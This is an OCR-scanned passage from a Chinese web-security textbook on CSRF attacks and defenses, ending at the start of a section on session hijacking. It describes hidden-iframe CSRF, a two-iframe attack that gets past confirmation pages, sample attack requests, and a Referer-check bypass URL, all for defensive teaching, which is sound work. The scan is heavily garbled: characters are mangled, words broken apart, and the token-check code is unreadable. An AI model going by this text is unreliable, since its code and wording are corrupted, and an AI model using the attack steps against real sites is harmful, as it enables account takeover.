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改 为 了 cracked。 
4-43 ”CSREF 攻击 成 功 
画 htpy/exomplejp/4s i O03 Php Windows ntermnet Pplorer cel 
全 已 © | 加 htpy/examplejp/45/45-003.php “| | x ||S sing pr 
帘 收 玉 夫 | 镍 htpi/examplejp/45/45-003.php | | IO) 











yamada 的 密码 已 更 改 为 cracked 











攻击 者 在 实际 发 动 攻击 时 ， 为 了 使 攻击 显得 隐蔽 ， 通 常会 采用 不 可 见 的 过 ame 来 布置 恶 ; 


网 页 ( 45-901.html )。 


4-44 ”隐藏 frame 以 进行 暗中 攻击 























商品 打折 信息 用 来 伪装 的 网 页 内 容 ) 
yamada 的 密码 已 更 改 为 cracked 





[@ http//examplejp/45/45-90L html - Windows internet Ecplorer SS R 
OO |@ hp//examplejp/s5/45-90Lhtml -3 |x || ang 有 到 
次 收 茂 夫 | 税 http://examplejp/45/45-901.html [ |: IEo 


+ 从 iframe 外 




















实际 攻击 











层 ( 攻击 对 象 ) 





Pp 会 将 iframe 部 分 隐藏 








出 


5 


的 内 容 


此 时 ,根据 同 源 策 略 ， 从 iframe 的 外 层 ( 恶意 网 页 ) 无 法 读 取 到 内 层 (攻击 对 象 ) 的 内 容 ， 





因此 ，CSRF 攻击 虽然 能 够 以 正规 用 户 的 权限 恶意 使 用 攻击 对 象 网 站 中 的 关键 处 理 ， 却 无 法 获取 


网 页 中 显示 的 内 容 。 


今 密码 被 更 改 也 会 导致 信息 泄漏 

















由 于 CSRF 攻击 者 不 能 获取 攻击 对 象 页 面 ， 因 此 便 无 法 穷 取信 息 。 但 是 ， 在 使 用 CSRF 攻击 


成 功 更 改 用 户 密码 后 ， 
息 J [e) 








令 CSRF 攻击 与 XSS 攻击 
CSRF 与 ( 反 























攻击 者 就 知道 了 更 改 后 的 密码 ， 从 而 也 就 能 够 登录 应 用 来 穷 取 被 害 人 的 信 


射 型 ) XSS 不 仅 名 称 相似 ， 攻 击 流程 也 如 出 一 略 ， 其 至 连 攻击 的 影响 也 有 相同 


之 处 ， 因 此 将 两 者 混淆 的 人 不 在 少数 。 而 为 了 区 分 两 者 ， 我 们 可 以 看 一 下 图 4-45 所 展示 的 CSRF 
和 反射 型 XSS 的 攻击 流程 。 根 据 此 图 可 以 看 出 ，CSRF 和 XSS 在 步骤 四 到 @@ 时 大 体 相 似 ， 之 后 








便 产 生 了 分 歧 。 
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4-45 CSRF 与 反射 型 XSS 的 比较 


恶意 网 站 


I 


@) 恶 意 HTML 





G) 攻击 用 请 求 正规 网 站 


区 攻击 用 响应 内 容 





的 脚本 ( XSS ) 


非法 操作 
(CSReY 














CSRF 是 指 恶 意 使 用 服务 器 对 步骤 @ 中 请 求 的 处 理 ， 恶 意 使 用 的 内 容 仅 限于 服务 器 端 提供 的 
处 理 。 

而 XSS 的 情况 下 ， 岛 的 请 求 中 包含 的 脚本 则 被 原封 不 动 地 以 响应 由 的 形式 返回 ， 随 后 该 
恶意 脚本 在 用 户 的 浏览 锅 中 被 执行 。 由 于 攻击 者 能 够 在 用 户 的 浏览 右上 执行 自己 准备 的 HTML 
或 JavaScript， 因 此 只 要 是 浏览 器 能 做 到 的 事 都 可 以 被 用 作 攻 击 手段 。 攻 击 者 甚至 还 能 够 通过 
JavaScript 亚 意 使 用 服务 器 端的 功能 ( 显示 在 图 中 的 话 就 是 步骤 @) 一 一 向 服务 器 发 出 恶意 请 求 )。 

由 此 可 见 ， 就 攻击 范围 来 说 ，XSS 的 威胁 更 大 ,但 针对 CSRF 漏洞 则 特别 需要 注意 如 下 两 点 。 


CSRF 需要 在 设计 阶段 就 考虑 防范 策略 
开发 者 对 CSRF 的 认 知 度 要 低 于 XSS，CSRF 对 策 方面 也 没有 太 大 进展 


令 存 在 确认 页 面 时 的 CSRF 攻击 

接 下 来 就 让 我 们 来 看 一 下 第 二 种 攻击 模式 ， 即 输入 页 面 与 执行 页 面 之 间 包 含 确认 页 面 时 的 情 
况 。 有 人 觉得 有 了 确认 页 面 后 CSRF 攻击 就 行 不 通 了 ,但 遗憾 的 是 这 是 个 普遍 的 误解 。 

下 面 以 更 改 邮箱 地 址 的 操作 为 例 进 行 说 明 。 一 旦 能 够 随意 更 改 他 人 的 邮箱 地 址 ， 就 可 以 使 用 
重 置 密码 等 功能 穷 取 用 户 密码 。 

确认 页 面 将 数据 传递 给 执行 页 面 的 方法 大 体 上 有 两 种 。 一 种 是 使 用 hidden 参数 (type 属性 
为 hidden 的 input 元 素 )， 另 一 种 是 使 用 会 话 变量 。 首 先 来 看 使 用 hidden 参数 的 情况 。 










































































今 使 用 hidden 参数 传递 参数 
下 图 展示 了 更 改 邮箱 地 址 操作 时 的 页 面 跳 转 情况 。 输 入 页 面 中 输入 的 邮箱 地 址 被 以 hidden 
参数 的 形式 戏 人 在 确认 页 面 中 ， 然 后 又 被 传递 给 了 执行 页 面 。 
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4-46 ”使 用 hidden 参数 传递 参数 
输入 页 面 


nl 
POST 


<input type="text" name="mail" 


value="foo@example.jp"> 
确认 页 面 


邮箱 地 址 : foo@examplejp 
se 
hidden 参数 


执行 页 面 <input type="hidden" name="mail" 
value="foo@example.jp"> 
邮箱 地 址 更 改 成 功 





























此 模式 下 的 CSRF 攻击 手段 与 没有 确认 页 面 时 的 情况 相同 。 这 是 因为 执行 页 面 从 输入 
( HTTP 请 求 ) 中 取得 邮箱 地 址 信息 这 一 点 与 之 前 的 例子 一 样 。 所 以 ， 上 面 介绍 的 恶意 HTML 几 
乎 是 被 直接 用 来 攻击 的 。 





~ 


今 使 用 会 话 变量 传递 参数 
针对 在 确认 页 面 和 执行 页 面 之 间 利用 会 话 变 量 传递 参数 的 网 站 ，CSREF 将 如 何 展开 攻击 呢 ? 
如 图 4-47 所 示 ， 确 认 页 面 将 接收 到 的 邮箱 地 址 保存 至 会 话 变量 ， 然 后 再 转 递 给 执行 页 面 。 


4-47 ”使 用 会 话 变量 传递 参数 











输入 页 面 
和 fete 


<input name="mail" 


祖 认 页 亩 value="foo@example.jp"> 
1 和 从 














邮箱 地 址 : foo@example.jp 将 邮箱 地 址 保存 至 会 话 变量 
sr $_SESSION['mail']=$ POST['mail']; 





执行 页 面 


邮箱 地 址 更 改 成 功 从 会 话 变量 中 获取 邮箱 地 址 


$mail=$ SESSION['mail']; 














针对 上 述 模 式 的 应 用 程序 发 动 攻击 ， 需 要 以 下 两 个 阶段 。 














1. 向 确认 页 面 发 送 POST 请 求 ， 使 邮箱 地 址 保存 到 会 话 变量 中 
2. 伺机 打开 执行 页 面 


实现 上 述 两 个 阶段 的 攻击 的 方法 如 下 图 所 示 ， 


图 4-48 使 用 2 个 iframe 元 素 的 两 个 阶段 的 攻击 




























































































于 伪装 的 网 页 内 容 
iframe1 iframe2 
句 确认 页 打开 执行 页 
POST 邮箱 地 址 
立刻 执行 10 秒 后 执行 
iframel 与 恶 


箱 地 址 就 被 保 让 到- 了 会 话 变 量 中 。 











需要 用 到 2 个 iframe 元 素 。 
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网 页 同时 打开 ， 并 向 确认 页 面 发 送 含有 邮箱 地 址 的 POST 请 求 。 这 样 一 来 邮 


在 恶意 网 页 打开 10 秒 钟 后 ，iframe2 打开 执行 页 面 并 完成 CSRF 攻击 。 这 时 ， 由 于 邮箱 地 址 
已 被 设置 到 会 话 变量 中 ， 因 此 邮箱 地 址 就 被 更 改 为 了 攻击 者 所 指定 的 邮箱 地 址 。 攻 击 成 功 。 

有 些 应 用 采取 向 导 的 形式 ， 要 经 过 多 个 步骤 才 到 达 最 后 的 执行 页 面 ， 这 种 情况 下 ， 只 需 增加 
iframe 的 数量 就 照样 能 够 实施 攻击 。 
专栏 : 针对 内 部 网 络 的 CSRF 攻击 COLUMN 

























































































































































































局 域 网 ) 的 服务 器 同 


， 从 而 允许 外 部 


URL、 参 数 名 、 功 能 等 


























可 能 遭受 


CSRF 攻击 的 攻击 目标 并 不 仅 限 于 发 布 到 互联 网 上 的 网 站 。 内 部 网 络 ( 
样 也 会 成 为 攻击 目标 。 例 如 ， 路 由 器 或 防火 墙 的 配置 页 面 中 存在 的 CSRF 漏洞 就 是 典型 案例 。 路 
由 器 或 防火 墙 的 管理 员 终 端 如 果 浏 览 了 恶意 网 站 ， 就 有 可 能 导致 机 器 被 非法 设 
的 访问 入 侵 。 
然而 , 实施 该 攻击 的 前 提 是 必须 要 知道 攻击 目标 中 安全 隐患 的 详细 信息 ( 
而 为 了 获取 攻击 所 需 的 信息 ， 一 般 可 采取 如 下 途径 。 
调查 市 面 上 贩卖 的 软件 或 仪器 的 安全 隐患 
退职 员工 等 有 过 访问 内 部 网 络 经 验 的 人 实施 攻击 
内 部 人 员 伴 装 外 人 实施 攻击 
由 此 可 见 ， 针 对 内 部 网 络 的 Web 系统 发 动 CSRF 攻击 是 可 行 的 。 同 样 ， 内 部 网 络 也 有 
XSS 等 其 他 被 动 攻 击 。 因 此 ， 即 使 是 内 部 系统 ， 如 果 对 安全 隐患 置之不理 的 话 同样 也 很 危险 。 











[eo 
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安全 隐患 的 产生 原因 
CSRF 漏洞 之 所 以 能 够 产生 ， 是 因为 Web 应 用 存在 以 下 特性 
(1 ) form 元 素 的 action 属性 能 够 指定 任意 域名 的 URL 
(2 ) 保存 在 Cookie 中 的 会 话 ID 会 被 自动 发 送 给 对 象 网 站 
(1) 的 问题 在 于 ， 即 便 是 恶意 网 站 ， 也 能 够 向 攻击 目标 网 站 发 送 请 求 。 而 (2 ) 的 问题 则 在 
于 ， 即 便 请 求 经 过 了 恶意 网 站 ,会话 ID 的 Cookie 值 也 照样 会 被 发 送 ， 从 而 导致 攻击 请 求 在 认证 
的 状态 下 被 发 送 。 
下 图 展示 了 常规 的 请 求 (正规 用 户 自 愿 发 送 的 请 求 ) 与 CSRF 攻击 的 请 求 ( 非 正 规 用 户 自愿 
发 送 的 请 求 ) 的 区 别 ( 仅 列 出 了 主要 项 目 )。 


用 户 自愿 发 送 的 HTTP 请 求 





让 





O 














POST /45/45-003 .php HTTP/1.1 

Referer: http://example.jp/45/45-002.php 
Content-Type: application/x-www-form-urlencoded 
Host: example.jp 

Cookie: PHPSESSID=isdvOmecsobejf20alnuf0r112 
Content-Length: 9 


pwd=pass1l 





CSRF 攻击 发 送 的 HTTP 请 求 





POST /45/45-003 .php HTTP/1.1 

Referer: http://trap.example.com/45/45-900.html 
Content-Type: application/x-www-form-urlencoded 
Host: example.jp 

Cookie: PHPSESSID=isdvOmecsobejf20alnuf0r112 
Content-Length: 9 


pwd=pass1l 











比较 两 者 后 可 以 得 知 ，HTTP 请 求 的 内 容 几 乎 一 模 一 样 ， 只 有 Referer 字段 存在 差异 。 用 户 
自愿 发 送 的 请 求 中 Referer 指向 密码 输入 页 面 的 URL， 而 CSRF 攻击 的 HTTP 请 求 中 Referer 却 
指向 了 恶意 网 页 的 URL。 

而 HTTP 请 求 中 Referer 以 外 的 部 分 则 全 部 相同 。 由 于 通常 情况 下 ，Web 应 用 中 并 不 会 检验 
Referer 的 值 ， 所 以 ， 如 果 开 发 者 没有 意识 去 确认 该 请 求 是 否 由 正规 用 户 自愿 发 送 ， 就 无 法 区 分 
两 者 。 这 时 就 会 引入 CSRF 漏洞 。 

另外 ， 虽然 我 们 目前 为 止 所 说 的 都 是 使 用 Cookie 进行 会 话 管理 的 网 站 的 情况 ， 而 事实 上 
使 用 其 他 自动 发 送 的 参数 进行 会 话 管理 的 网 站 ， 同 样 也 会 受到 CSRF 攻击 。 具 体 来 说 ， 像 使 用 
HTTP 认证 、SSL 客户 端 认 证 、 手 机 的 移动 ID (i-modeID、EZ 号 、 终 端 序列 号 等 ) 等 进行 认证 
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的 网 站 ， 都 有 可 能 受到 CSRF 攻击 的 影响 。 


对 策 SR 
前 面 已 经 强调 过 ， 防 御 CSRF 的 关键 为 确认 关键 处 理 的 请 求 确实 是 由 正规 用 户 自愿 发 送 的 。 
因此 ， 作 为 CSRF 的 防范 策略 ， 需 执行 以 下 两 点 。 


和 蔓 选 出 需要 防范 CSRF 攻击 的 页 面 
使 代码 有 能 力 辨 认 是 否 是 正规 用 户 的 自愿 请 求 
下 面 我 们 就 来 详细 地 解说 以 上 两 点 。 





























令 往 选 出 需要 防范 CSRF 攻击 的 页 面 

并 非 所 有 页 面 都 需要 实施 CSRF 防御 策略 ， 事 实 上 无 需 防 范 CSRF 的 页 面 居 多 。 通 常情 况 
下 ，Web 应 用 的 入 口 并 非 只 有 一 处 ， 通 过 搜索 引擎 、 社 交 书 签 、 其 他 链接 等 方式 都 能 进入 到 Web 
应 用 中 的 各 种 页 面 。 比 如 EC (电子 商务 ) 网 站 一 般 就 非常 欢迎 通过 外 部 链接 进入 到 它 的 商品 展 
示 页 面 。 而 像 这 种 页 面 就 不 用 实施 CSRF 对 策 。 

而 另 一 方面 ，EC 网 站 中 的 购买 商品 、 更 改 密码 或 确认 个 人 信息 等 页 面 ， 就 不 能 够 任 由 其 他 
网 站 随意 执行 。 这 样 的 页 面 就 应 当 实施 CSRF 防范 策略 。 

以 下 为 EC 网 站 的 简易 的 页 面 跳 转 图 。 图 中 需要 防范 CSRF 的 页 面 为 “购买 ”和 “和 更改” 页 
面 "。 需 要 防范 CSRF 的 页 面 添加 了 阴影 。 


图 4-49 EC 网 站 的 页 面 跳 转 图 































































































































































































i 
| 品 | 添加 到 NT A 全 确 主 = 
一 此 表 品 2 | 网 车 | 了 | 认证 | | 收 全 他 直 | | 购 史 | 中风 
- / 修改 确认 
> 天 区 A 二 
商品 3 迷 任 意 页 中 个 人 信息 | 个 人 信息 | 由， 更改 
需要 防范 CSRF 的 页 
































鉴于 上 述 这 种 情况 ， 开 发 者 在 开发 过 程 中 ， 应 当 执 行 以 下 流程 。 
在 需求 分 析 阶 段 制作 功能 一 览 表 ,标记 出 需要 执行 CSRF 防范 策略 的 功能 
在 概要 设计 阶段 制作 页 面 跳 转 图 ， 标 记 出 需要 执行 CSRF 防范 策略 的 页 面 
在 开发 阶段 实施 CSRF 防范 策略 








人 “添加 到 购物 车 ”页 面 也 需要 防范 CSRF。 不 过 ， 即 使 被 第 三 方 随意 添加 了 购 入 商品 ， 用 户 在 付款 前 也 应 该 能 够 察觉 
到 。 因 此 ， 如 果 作 为 一 种 营销 模式 而 允许 外 界 添加 商品 的 话 ， 就 可 以 选择 不 对 该 页 面 执 行 CSRF 防范 策略 。 
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接 下 来 我 们 就 来 看 一 下 具体 的 开发 方法 。 
令 确 认 是 正规 用 户 自愿 发 送 的 请 求 

确认 请 求 由 正规 用 户 自愿 发 送 是 CSRF 防御 策略 中 必需 的 步骤。 
下 图 中 ， 假 设 将 用 户 点 击 “ 执 行 ”按钮 后 发 送 的 请 求 作为 用 户 自愿 发 送 的 请 求 ， 而 非 自愿 的 
请 求 ， 即 为 从 恶意 网 站 发 出 的 请 求 。 两 者 的 对 比如 下 。 

4-50 ”正规 用 户 自愿 发 送 的 请 求 * 非 自愿 发 送 的 请 求 






















































































正规 用 户 自愿 发 送 的 请 求 非 正规 用 户 自 愿 发 送 的 请 求 
正规 网 站 恶意 网 站 
即将 更 改 密码 于 伪装 的 









































将 用 户 在 正规 网 站 上 点 
按钮 后 发 送 的 请 求 视 为 了 请 求 ， 不 是 正规 用 户 自愿 
规 用 户 自愿 发 送 的 请 求 发 送 的 请 求 
具体 来 说 ， 判 断 请 求 是 否 为 正规 用 户 自愿 发 送 的 实现 方法 ， 有 如 下 3 类 。 
般 入 机 密 信息 ( 令 牌 ) 
再 次 输入 密码 


检验 Referer 


下 面 就 让 我 们 来 依次 说 明 。 


























浏览 恶意 网 站 后 被 发 送 的 
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作 戏 入 机 密 信息 ( 令 牌 ) 

如 果 访 问 需 防 范 CSRF 的 页 面 (登录 页 面 、 订 单 确认 页 面 等 ) 时 需要 提供 第 三 方 无 法 得 知 的 
机 密 信 息 的 话 ， 那 么 即使 出 现 非 正规 用 户 自愿 发 送 的 请 求 ， 应 用 端 也 能 够 通过 判断 得 知 请 求 是 否 
合法 。 用 于 此 目的 的 机 密 信息 被 称 为 令 牌 (Token )。 会 话 ID 就 是 一 种 既 简单 又 安全 的 令 牌 的 实 
现 方法 。 

下 面 我 们 就 来 看 一 下 骨 入 令 牌 并 进行 检验 的 例子 。 


代码 清单 ” 明 入 令 牌 的 例子 ( 执行 页 面 的 前 一 个 页 面 ) 





























<form action="chgpwddo.php" method="POST"> 

新 密码 <input name="pwd" type="password"><br> 

unpueMe ypeuanen am oe al ue a 
SecnognenmusgscnmacnassssssmongToWR ENIICOMEATD Ue Om 

<input type="submit" value=" 更 改 密码 "> LL 幢 入 令 牌 
</form> 























4.5 “关键 处 理 中 引入 的 安全 隐患 | 131 








代码 清单 ”确认 令 牌 的 例子 ( 执行 页 面 ) 





Session start(); [确认 令 
if (session id() SS gH Bonleesa yy | 
die(' 请 从 正规 的 页 面 进行 操作 ') ; // 显示 合适 的 错误 消息 


} 
// 下 面 将 执行 关键 处 理 



























































通过 要 求 提供 第 三 方 无 法 得 知 的 令 牌 ， 从 而 成 功 防 御 了 CSRF 攻击 。 

在 页 面 跳 转 有 三 次 以 上 的 情况 下 ， 如 “输入 - 确认 - 执行 ”模式 ， 骨 人 令 牌 的 页 面 也 同样 应 
当 为 执行 页 面 的 前 一 个 页 面 。 

另外 ， 接 收 令 牌 的 请 求 (接收 关键 处 理 的 请 求 ) 必须 为 POST 方法 。 因 为 假如 使 用 GET 方 
法 发 送 机 密 信息 的 话 ， 令 牌 信息 就 有 可 能 通过 Referer 泄漏 出 去 "。 


专栏 : 令 牌 与 一 次 性 令 牌 COLUMN 
有 一 种 令 牌 叫 作 一 次 性 令 牌 。 一 次 性 令 牌 使 用 一 次 后 即 作 废 。 因 此 每 当 需 要 一 次 性 令 牌 时 都 
会 生成 不 同 的 值 。 生 成 一 次 性 令 牌 时 通常 使 用 密码 学 级 别 的 伪 随 机 数 生成 器 ( 参考 4.6.2 节 )。 
次 性 令 牌 经 常 被 用 于 需要 防范 重 放 攻 击 ( Replay Attack ) 的 情况 下 。 重 放 攻 击 是 指 ， 在 监听 得 
到 加 密 的 请 求 后 ,将 该 请 求 原 封 不 动 地 再 次 发 送 而 达到 伪装 的 效果 。 一 次 性 令 牌 能 有 效 防 御 重 放 攻 击 。 
关于 一 次 性 令 牌 是 否 应 该 用 于 CSRF 的 防范 策略 ， 目 前 为 止 还 没有 形成 统一 的 认识 。 昌 然 有 
人 主张 使 用 一 次 性 令 牌 会 提升 安全 性 ， 但 基于 以 下 理由 ， 本 书 并 不 推荐 使 用 一 次 性 令 牌 。 

















































































































































































































CSRF 攻击 与 重 放 攻击 毫 不 相干 ， 因 此 并 非 一 定 要 使 用 一 次 性 令 牌 
没有 证 据 能 说 明 一 次 性 令 牌 比 使 用 会 话 ID 作为 令 牌 的 方法 更 安全 
使 用 一 次 性 令 牌 有 时 会 导致 正常 的 操作 也 出 错 
另外 ， 在 一 些 介绍 一 次 性 令 牌 的 书籍 中 ， 很 多 生成 令 牌 的 方法 并 不 安全 。 例 如 ， 使 用 不 安全 
的 随机 数 ， 或 者 使 用 当前 时 间 的 方法 等 。 这 些 方 法 都 不 如 使 用 会 话 ID 作为 令 牌 值 安全 。 
寻 此 ， 应 当 避 免 自 己 生 成 一 次 性 令 牌 的 方法 。 


























































































































今 再 次 输入 密码 
让 用 户 再 次 输入 密码 ， 也 是 用 来 确认 请 求 是 否 由 用 户 自愿 发 起 的 一 种 方法 。 
除了 用 来 防范 CSRF 攻击 ， 再 次 输入 密码 也 可 以 被 用 于 其 他 目的 。 









































在 用 户 下 订单 之 前 ， 再 次 向 用 户 确认 购买 意向 
能 够 确认 此 时 在 电脑 前 操作 的 确实 是 用 户 本 人 











QD ” HTTP/1.1 的 规格 文档 RFC2616 中 记载 了 含有 更 新 处 理 的 页 面 不 应 使 用 GET 方 法 (9.1.1 节 )， 由 此 可 见 ， 需 要 防范 
CSRF 的 页 面 本 来 就 不 应 该 使 用 GET， 而 应 当 使 用 POST 方法 。 
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因此 ， 当 页 面 有 上 述 需求 时 ， 最 好 采用 再 次 输入 密码 的 方法 来 防范 CSRF。 而 对 其 他 的 页 面 
(如 注销 处 理 ) 来 说 ， 让 用 户 再 次 输入 密码 ， 反 而 会 降低 应 用 的 易 用 性 "。 
前 面 在 讲解 CSRF 攻击 时 所 列举 的 密码 变更 功能 是 安全 性 方 面 的 重要 功能 ， J 为 了 再 次 
确认 操作 者 确实 为 用 户 本 人 ， 要 求 用 户 再 次 输入 密码 是 目前 非常 普遍 的 一 种 方式 ” 
不 论 是 有 3 个 以 上 页 面 的 “输入 -确认 - 执行 ”模式 ， 还 是 向 导 模 式 ， 要 求 确认 密码 的 页 面 
都 应 该 是 最 后 的 执行 页 面 。 如 果 仅 在 中 途 的 某 个 页 面 进行 密码 确认 ， 根 据 代 码 实 现 方法 还 是 可 能 
会 存在 CSRF 漏洞 ， 所 以 要 求 输入 密码 的 时 机 非常 重要 。 




































































人 检验 Referer 

在 执行 关键 处 理 的 页 面 确认 Referer， 也 是 CSRF 的 一 种 防范 策略 。 正 如 “安全 隐患 的 产生 
原因 ”这 一 小 节 所 讲述 的 那样 ， 正 规 请 求 与 CSRF 攻击 请 求 的 Referer 字段 的 内 容 不 同 。 正 规 请 
求 中 Referer 的 值 应 该 为 执行 页 面 的 上 一 个 页 面 (输入 页 面 或 确认 页 面 等 ) 的 URL， 这 一 点 一 定 
要 得 到 确认 。 下 面 就 是 检验 Referer 的 示例 。 

















if (preg match('#\Ahttp://example\.jp/45/45-002\.php#', 
@$_SERVER [ "HTLP REFERER" 下 | { 

die (' 请 从 正规 的 页 面 进行 操作 ') ; ”// 显示 合适 的 错误 消息 

} 









































检验 Referer 的 方法 也 存在 缺陷 。 因 为 如 果 用 户 设置 为 不 发 送 Referer， 页 面 就 会 无 法 正常 显 
示 。 通 过 个 人 防火 墙 或 浏览 需 的 插件 等 禁止 Referer MA 另外 ,手机 的 浏览 器 中 也 
有 不 发 送 Referer 的 浏览 锅 和 能 够 关闭 发 送 Referer 功能 的 浏览 

另外 ,检验 Referer 时 还 容易 产生 朴 漏 这 一 点 一 定 要 引起 注意 。 例如 ， 下 面 的 检验 就 存在 
安全 隐患 。 











// Referer 检验 存在 漏洞 的 示例 

if (preg match ('#^http://exampleN\.jp#'，@$ SERVER ['HTTP REFERER']) 
!== 1) { // 以 下 为 错误 处 理 

// 能 够 绕 过 上 述 校 验 的 示例 URL ( 域名 为 example .com， 而 非 example.Jjp) 

// http://example.jp.trap.example.com/trap.html 


























问题 出 在 example.jp 后 面 的 /没有 得 到 检验 。 检 验 Referer 时 ， 必 须要 使 用 前 方 一 致 检索 检 
验 绝对 URL， 包 括 域 名 后 的 /。 

男 一 方面 ， 检 验 Referer 方法 所 需 的 代码 量 是 最 少 的 。 因 为 其 他 两 种 方法 都 需要 在 2 个 页 面 
中 追加 处 理 ， 而 检验 Referer 方法 只 需要 在 执行 关键 处 理 的 页 面 上 追加 处 理 即 可 。 


中 ”注销 处 理 对 安全 性 的 影响 度 较 低 ， 所 以 很 多 情况 下 会 容许 存在 隐患 。 而 且 ， 就 算 针 对 注销 处 理 采取 CSRF 防范 策略 ， 
注销 前 让 用 户 再 次 输入 密码 也 会 让 人 感觉 极 不 自然 。 

思 不仅 需要 输入 当前 的 密码 ， 由 于 密码 的 输入 框 通常 看 不 到 输入 值 ， 为 了 防止 输入 错误 ， 新 密码 的 情况 下 一 般 会 要 求 
输入 两 遍 。 
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综 上 所 述 ， 通 过 检验 Referer 来 防范 CSRF 漏洞 的 方法 ， 其 适用 范围 应 该 被 限定 在 对 公司 的 


内 部 系统 等 能 够 限定 用 户 环境 的 既 有 应 用 实施 安全 隐患 对 策 的 情况 。 


2 CSRF 防范 策略 的 比较 














































































































































































































这 里 ， 我 们 对 以 上 讲述 的 三 种 CSRF 防范 策略 加 以 比较 归纳 ， 如 表 4-12 所 示 。 
表 4-12 CSRF 防范 策略 的 比较 
嵌入 令 牌 再 次 输入 密码 确认 Referer 

开发 耗 时 中 中 小 

对 用 户 的 影响 尖 增加 了 输入 密码 的 麻烦 。 | 下 几 生 人 
能 否 用 于 手机 网 站 可 可 不 可 

, 最 基本 的 防御 策略 ， 所 有 情 | 需要 防范 他 人 伪装 或 者 确认 | 用 于 能 够 限定 用 户 环境 的 既 
i 况 下 均 可 使 需求 很 强 的 页 面 有 应 用 的 CSRF 防范 策略 
*1 ”如 果 作 为 既 有 系统 的 CSRF 防范 策略 而 从 后 期 添加 的 话 ， 因 为 需要 修改 页 面 ， 所 以 可 能 会 非常 耗 时 。 


令 CSRF 的 辅助 性 对 策 





执行 完 关 键 处 理 后 ， 建 议 向 用 户 注册 的 邮箱 发 送 有 关 处 到 



































内 容 的 通知 邮件 。 


发 送 通 知 邮 件 虽然 不 能 防范 CSRF 攻击 ， 但 是 在 万 一 遭受 了 CSRF 攻击 的 情况 下 能 在 第 一 时 
间 让 用 户 知情 ， 从 而 将 损害 降 到 最 低 。 


另外 ， 除 了 CSRF 攻击 之 外 ， 在 攻击 者 通过 XSS 攻击 伪装 成 用 户 操作 关键 处 理 时 ， 发 送 通 





知 邮 件 也 能 够 使 用 户 尽早 发 现 ， 可 谓 大 有 神 益 。 




















知 用 户 有 人 恶意 执行 了 关键 处 理 。 而 如 果 月 


历史 或 发 送 历 史 等 内 容 。 
令 对 策 总 结 





CSRF 漏洞 的 根本 性 防范 策略 如 下 。 
筛选 出 需要 防范 CSRF 的 页 面 
确认 是 正规 用 户 自愿 发 起 的 请 求 








但 是 ， 由 于 邮件 是 未 经 加 密 的 明文 传输 ， 因 此 ， 最 好 不 要 在 邮件 中 添加 重要 信息 ， 而 只 是 通 
有 户 想 要 了 解 详情 的 话 ， 可 以 登录 Web 应 用 查看 购买 























其 中 ,确认 请 求 确实 由 用 户 自愿 发 起 的 方法 有 以 下 三 种 。 三 种 方法 的 比较 请 参考 表 4-12。 
艇 入 机 密 信 息 ( 令 牌 ) 


再 次 输入 密码 


检验 Referer 


另外 ,作为 CSRF 漏洞 的 辅助 性 对 策 ， 可 以 执行 以 下 操作 。 
执行 完 关 键 处 理 后 ， 向 用 户 注册 的 邮箱 发 送 通 知 邮件 
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4.6 不 完善 的 会 话 管理 





Web 应 用 中 经 常 使 用 会 话 管理 机 制 来 记忆 认证 结果 等 当前 状态 。 当 今 主 流 的 会 话 管理 机 制 
为 ， 使 用 Cookie 等 记忆 会 话 ID 这 个 标识 符 ， 而 此 会 话 ID 的 作用 就 相当 于 获取 服务 器 端 信息 的 
钥匙 。 
接 下 来 ， 本 节 就 将 讲述 会 话 管理 机 制 以 及 使 用 方法 不 妥善 而 产生 的 安全 隐患 。 




















4.6.1 ”会话 支持 的 原因 及 影响 
如 果 由 于 某 些 原 因 ， 某 用 户 的 会 话 ID 被 第 三 方 得 知 的 话 ， 就 会 出 现 他 人 伪装 成 该 用 户 访 问 
应 用 的 危险 。 第 三 方 恶意 利用 会 话 ID 来 伪装 成 他 人 的 攻击 手段 就 被 称 为 会 话 劫持 。 
第 三 方 获取 会 话 ID 的 手段 有 如 下 3 类 。 
预测 会 话 ID 
窃取 会 话 ID 
挟持 会 话 ID 


下 面 我 们 就 来 分 别 看 一 下 以 上 3 种 手段 的 概况 。 




















令 预 测 会 话 ID 

如 果 生 成 会 话 ID 的 方法 不 妥善 ,用户 的 会 话 ID 就 可 能 会 被 第 三 方 预测 成 功 ， 进 而 造成 会 
话 劫持 。 第 3 章 中 所 介绍 的 连续 数值 就 是 一 种 不 妥善 的 会 话 ID， 除 此 之 外 ， 基 于 日 期 时 间或 用 
户 名 生成 的 会 话 ID 也 不 安全 。 开 源 软件 等 生成 会 话 ID 的 人 逻辑 对 外 公开 的 情况 下 ， 外 界 就 能 
据 代码 中 的 逻辑 推测 出 会 话 ID ， 而 源 代 码 或 逻辑 不 公开 的 情况 下 外 界 也 有 可 能 稍 费时 日 从 而 破 
解 出 会 话 ID 的 生成 方法 。 








人 窃取 会 话 ID 
如 果 会 话 DD 被 外 界 窃取 ， 就 有 可 能 造成 会 话 劫持。 人 穷 取 会 话 ID 的 方法 有 如 下 几 种 。 
生成 Cookie 时 的 属性 设置 不 妥善 而 遭 汇 漏 (参考 第 3 章 ) 
会 话 ID 在 网 络 上 被 监听 (参考 7.3 节 
由 于 跨 站 脚本 等 应 用 中 的 安全 隐患 而 遭 汇 漏 (后 述 ) 
由 于 PHP 或 浏览 右 等 平台 的 安全 隐患 而 遭 泄 漏 
会 话 了 D 保存 在 URL 中 时 经 由 Referer 消息 头 泄漏 (参考 4.6.3 节 ) 


应 用 中 能 被 用 于 窃取 会 话 ID 的 代表 性 安全 隐患 有 以 下 几 种 。 
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路 站 脚本 (XSS ) (参考 4.3.1 节 ) 
HTTP 消息 头 注入 (参考 4.7.2 节 ) 
磐 入 在 URL 中 的 会 话 ID (参考 4.6.3 节 ) 


关于 各 隐患 的 详情 请 参考 各 个 章节 。 


令 挟 持 会 话 ID 

除了 窃取 会 话 ID 这 种 方式 外 ， 如 果 能 将 会 话 ID 强制 设置 到 用 户 的 浏览 器 中 ,攻击 者 也 就 
相当 于 “得 知 ” 了 用 户 的 会 话 ID ， 因 此 也 就 能 够 形成 会 话 劫 持 。 这 种 攻击 被 称 为 “会 话 固定 攻 
击 ”( Session Fixation Attack )。 会 话 固定 攻击 在 第 3 章 已 经 做 过 概述 ， 其 防范 策略 等 详情 将 于 
4.6.4 节 讲 述 。 


令 会 话 动 持 的 方法 总 结 
接 下 来 ,我 们 将 以 上 介绍 的 会 话 动 持 的 方法 加 以 归纳 ， 如 下 表 所 示 。 








表 4-13 会 话 动 持 总 结 










































































































































































分 类 攻击 对 象 攻击 方法 安全 隐患 解说 
应 用 程序 预测 会 话 ID 制 会 话 管理 机 制 中 的 安全 隐患 | 4.6.2 节 
